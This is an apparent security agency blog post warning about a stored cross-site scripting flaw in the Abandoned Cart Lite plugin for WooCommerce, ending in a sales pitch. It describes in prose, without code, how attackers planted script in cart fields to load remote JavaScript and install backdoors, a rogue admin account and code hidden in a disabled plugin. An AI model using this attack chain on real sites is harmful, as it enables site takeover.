Hackers are way ahead in finding loopholes in frameworks like WordPress vulnerability.
There are hundreds and thousands of plugins used within Worpress vulnerability, paid and free.
It becomes very difficult for finding the vulnerability within these plugins. And hackers know this and outpace the agencies (Wordfence) that keep an eye on such vulnerable plugins.
Recently (12-03-2019) one such vulnerability was traced to a WordPress vulnerability plugin that lets the website owner know which users left the site by adding a product to cart but not buying it. Detailed Article here
The way the hackers gain entry is rarely spotted and seems to be a new method of attacking WordPress based sites.
The hackers are exploiting the cross-site scripting which has been a vulnerability with the abandoned cart plugin.
The mode of operation vulnerability
The hackers use this abandoned cart functionality by adding a code in the harmless fields of the shopping cart.
Due to the functionality of the plugin, this code is saved to the database to be fetched for admin in the backend.
Whenever the admin accesses the backend admin panel for checking out the abandoned cart the code is executed which calls a remote Javascript file.
This script installs 2 backdoors on the site.
One of the backdoors creates an admin account and the other one searches for the last disabled plugin and replaces its malicious code of the disabled plugin.
A disabled plugin is still accessible to the hackers, this is the contingency plan of the hackers.
If the admin deletes the admin user created by them, they still can access the site through the second backdoor.
We recommend to not to use this plugin till the fixes are made by the developer of the plugin.
Abandoned Cart Lite for WooCommerce
At Veblogy we keep an eye on such vulnerabilities so that your site and your users remain safe from any of the hacking attempts by such hackers.
Make your site a safe place for your users. Fill up the below form for more details.